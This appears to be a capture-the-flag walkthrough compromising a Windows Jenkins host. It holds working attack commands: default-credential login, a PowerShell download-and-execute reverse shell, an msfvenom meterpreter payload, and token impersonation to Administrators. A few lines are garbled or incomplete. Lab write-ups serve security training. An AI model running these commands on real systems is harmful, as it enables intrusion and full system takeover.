Run nmap [Target Machine IP]
There are 3 ports open (TCP connect).
Open [Target Machine IP]:80 and [Target Machine IP]:8080.
[Target Machine IP]:8080 is a login page to Jenkins. Google for the default password of Jenkins (admin:admin).
Once you login, you will see a build. If you look at the build job, you can see that this is a Windows machine. Configure the job and insert the reverse shell to the build command:
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
Download this powershell in attacker machine and host the file with python server (port 8888).
nc -lvnp 4444 in attacker machine. Then trigger a build in this job.
We will get a shell from the Target machine. Look for the user.txt (usually it is in the one of the user’s document or desktop folder).
e text contains:
Generate a payload
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[ATTACKER IP] LPORT=3333 -f exe -o shell.exe
Open the msfconsole in attacker machine and run these commands (line by line):
msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [ATTACKER IP] set LPORT 3333 run
Download the shell.exe into the Target machine using Jenkins.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://[ATTACKER IP]:8888/shell.exe','shell.exe')"
In the machine, run
Start-Process shell.exe to upgrade the shell.
If this is successful, you will see the output in the msfconsole
Privilege Escalation with Access Token
Find out what is the privilege of the user using
In msfconsole, load incognito and run list_tokens -g to find out the available tokens.
Run impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators token
Start a shell.